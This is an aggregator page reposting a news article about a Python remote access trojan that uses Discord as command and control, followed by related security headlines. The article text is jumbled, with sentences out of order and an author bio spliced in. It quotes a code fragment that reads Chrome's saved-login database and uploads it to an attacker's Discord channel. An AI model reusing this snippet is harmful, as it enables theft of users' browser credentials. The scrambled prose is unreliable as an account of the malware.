CyberSecurityBoard
Sponsor Register Login

New Python-Based Discord RAT Attacking Users to Steal Login Credentials

Content == "Sending Command #2 - Password Stealer" and message.channel.id == channelid: username = os.getlogin() try: passwords = open(f"C:/Users/{username}/AppData/Local/Google/Chrome/User Data/Default/Login Data", "rb").read() await message.channel.send("Password Stealer:", file=discord.File(io.BytesIO(passwords), filename="passwords.db")) await message. When activated, the RAT attempts to extract saved passwords from popular web browsers, particularly targeting Google Chrome’s credential database, before transmitting the stolen information directly to attackers via Discord’s file-sharing capabilities. A sophisticated Python-based Remote Access Trojan (RAT) leveraging Discord as its command and control infrastructure has been identified targeting users worldwide. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. This malware enables attackers to execute arbitrary system commands, capture screenshots, and most critically, steal saved login credentials from web browsers. This code directly accesses Chrome’s Login Data file, which contains sensitive stored credentials, and transmits the entire database file to attackers through Discord’s messaging system. Once installed on a victim’s system, the malware creates a dedicated control channel on Discord servers, establishing persistent communication with the attacker. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. PJobRAT, an Android Remote Access Trojan (RAT) first observed in 2019, has recently resurfaced with enhanced capabilities and a refined targeting strategy. This architecture allows cybercriminals to issue commands remotely while avoiding traditional network security monitoring that might not flag Discord-related traffic as suspicious. The Discord-based delivery mechanism makes this attack particularly concerning as it exploits a legitimate and widely used platform, potentially affecting millions of users across gaming and professional communities. Tushar is a Cyber security content editor with a passion for creating captivating and informative content.

This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 28 Mar 2025 17:25:03 +0000


Cyber News related to New Python-Based Discord RAT Attacking Users to Steal Login Credentials

The Persistent Danger of Remcos RAT - From initial infection to persistent control, the Remcos RAT campaign exemplifies the evolving nature of cyber threats and the need for proactive defense measures. This ecosystem is supported by a diverse array of servers that function as command and ...
2 years ago Cyberdefensemagazine.com
New Python-Based Discord RAT Attacking Users to Steal Login Credentials - Content == "Sending Command #2 - Password Stealer" and message.channel.id == channelid: username = os.getlogin() try: passwords = open(f"C:/Users/{username}/AppData/Local/Google/Chrome/User Data/Default/Login Data", "rb").read() await ...
9 months ago Cybersecuritynews.com
Digital Battlefield: Syrian Threat Group's Sinister SilverRAT Emerges - Cyfirma claims that the developers maintain a sophisticated and active presence on multiple hacker forums and social media platforms, as outlined by the cybersecurity company. Besides operating a Telegram channel offering leaked databases, carding ...
2 years ago Cysecurity.news
Python 2 EOL: Coping with Legacy System Challenges - Python 2.7 was the last major version in the 2.x series of this software language, which was launched on July 3, 2010 and was officially maintained and supported until January 1, 2020. At that point, when the Python 2 EOL phase began, the legacy ...
2 years ago Securityboulevard.com
Bloomberg Crypto X account snafu leads to Discord phishing attack - The official Twitter account for Bloomberg Crypto was used earlier today to redirect users to a deceptive website that stole Discord credentials in a phishing attack. As first spotted by crypto fraud investigator ZachXBT, the profile contained a link ...
2 years ago Bleepingcomputer.com Scattered Spider
Discord adds Security Key support for all users to enhance security - Discord has made security key multi-factor authentication available for all accounts on the platform, bringing significant security and anti-phishing benefits to its 500+ million registered users. The popular social platform first highlighted the ...
2 years ago Bleepingcomputer.com
SideCopy Exploiting WinRAR Flaw in Attacks Targeting Indian Government Entities - The Pakistan-linked threat actor known as SideCopy has been observed leveraging the recent WinRAR security vulnerability in its attacks targeting Indian government entities to deliver various remote access trojans such as AllaKore RAT, Ares RAT, and ...
2 years ago Thehackernews.com CVE-2023-38831 APT3 SideCopy Transparent Tribe
Malicious Python Package Mimic as Attacking Discord Developers With Malicious Remote Commands - The package specifically targeted developers building or maintaining Discord bots-typically indie developers, automation engineers, or small teams who might install such tools without extensive security scrutiny. Following identification, the ...
8 months ago Cybersecuritynews.com
Microsoft: New RAT malware used for crypto theft, reconnaissance - Last but not least, Microsoft says StilachiRAT allows command execution and potential SOCKS-like proxying using commands from a command-and-control (C2) server to the infected devices, which can let the threat actors reboot the compromised system, ...
9 months ago Bleepingcomputer.com
How Stealthy Python Rat Malware is Targeting Windows Systems - Cybersecurity experts have recently alerted Windows users to a new malware threat: a stealthy python-based RAT malware that is specifically targeting Windows systems. The malware, which has been dubbed “Python Rat” by security researchers, has ...
2 years ago Bleepingcomputer.com
A New, Spookier Gh0st RAT Malware Haunts Global Cyber Targets - A new variant of the infamous "Gh0st RAT" malware has been identified in recent attacks targeting South Koreans and the Ministry of Foreign Affairs in Uzbekistan. The Chinese group "C.Rufus Security Team" first released Gh0st RAT on the open Web in ...
2 years ago Darkreading.com
Protect your Discord account with a Security Key - Users of the chat app Discord may now protect their accounts using security keys. The developers of Discord have added the option to the existing arsenal of multi-factor authentication options that the service supports. Discord users are encouraged ...
2 years ago Ghacks.net
New Python RAT Mimics as Legitimate Minecraft App - A new Python-based Remote Access Trojan (RAT) has been discovered masquerading as a legitimate Minecraft application, posing a significant threat to users. This malware exploits the popularity of Minecraft to deceive victims into downloading and ...
2 months ago Cybersecuritynews.com
Krasue RAT Uses Cross-Kernel Linux Rootkit to Attack Telecoms - Attackers likely tied the creators of the XorDdos Linux remote access Trojan have been wielding a separate Linux RAT for nearly two years without detection, using it to target organizations in Thailand and maintain malicious access to infected ...
2 years ago Darkreading.com
Malicious PyPi package hides RAT malware, targets Discord devs since 2022 - The attackers could use the malware to gain unauthorized access to credentials and more (e.g., tokens, keys, and config files), steal data and monitor system activity without being detected, remotely execute code for deploying further ...
8 months ago Bleepingcomputer.com
New Komex Android RAT Advertised on Hacker Forums - A new Android Remote Access Trojan (RAT) named Komex has been spotted being advertised on various hacker forums. This emerging malware targets Android devices, enabling threat actors to gain unauthorized access and control over infected smartphones ...
2 months ago Cybersecuritynews.com
NEPTUNE RAT Attacking Windows Users to Exfiltrate Passwords from 270+ Apps - Security experts recommend users maintain updated antivirus software, implement application whitelisting, disable PowerShell execution for standard users, and be vigilant about suspicious links or commands. As Neptune RAT continues to evolve with new ...
9 months ago Cybersecuritynews.com
FBI Shuts Down Warzone RAT; Cybercriminals Arrested - In a major victory against cybercrime, the FBI has successfully taken down the Warzone RAT malware operation. This operation led to the arrest of two individuals involved in the illicit activities. One of the suspects, 27-year-old Daniel Meli from ...
1 year ago Cysecurity.news
Chinese hackers target Russian govt with upgraded RAT malware - Security researchers at Kaspersky's Global Research and Analysis Team (GReAT) spotted the updated implant while investigating recent attacks where the attackers deployed the RAT malware using a malicious MMC script camouflaged as a Word ...
8 months ago Bleepingcomputer.com CVE-2021-40449
SugarGh0st RAT Delivered via Malicious Windows & JavaScript - RATs allow threat actors to execute the following malicious actions while remaining hidden from the victim:-. Recently, cybersecurity researchers at Cisco Talos discovered a malicious campaign that was found to be delivering a new RAT that's been ...
2 years ago Cybersecuritynews.com
CVE-2022-33684 - The Apache Pulsar C++ Client does not verify peer TLS certificates when making HTTPS calls for the OAuth2.0 Client Credential Flow, even when tlsAllowInsecureConnection is disabled via configuration. This vulnerability allows an attacker to perform a ...
2 years ago
'PhantomBlu' Cyberattackers Backdoor Microsoft Office Users via OLE - A malicious email campaign is targeting hundreds of Microsoft Office users in US-based organizations to deliver a remote access trojan that evades detection, partially by showing up as legitimate software. Threat actors previously have used the RAT ...
1 year ago Darkreading.com
Windows Incident Response: Human Behavior In Digital Forensics, pt II - Targeted Threat ActorI was working a targeted threat actor response, and while we were continuing to collect information for scoping, so we could move to containment, we found that on one day, from one endpoint, the threat actor pushed their RAT ...
2 years ago Windowsir.blogspot.com
Credentials are Still King: Leaked Credentials, Data Breaches and Dark Web Markets - Infostealers infect computers, steal all of the credentials saved in the browser along with active session cookies and other data, then export it back to command and control infrastructure before, in some cases, self-terminating. This article will ...
1 year ago Bleepingcomputer.com
Threat Actors Weaponize Discord Webhooks for Malicious Activities - Cybersecurity researchers have uncovered a rising trend where threat actors exploit Discord webhooks to conduct malicious activities. Discord, a popular communication platform, offers webhooks that allow automated messages and data sharing. However, ...
3 months ago Cybersecuritynews.com

Latest Cyber News


    Cyber Trends (last 7 days)


    Trending Cyber News (last 7 days)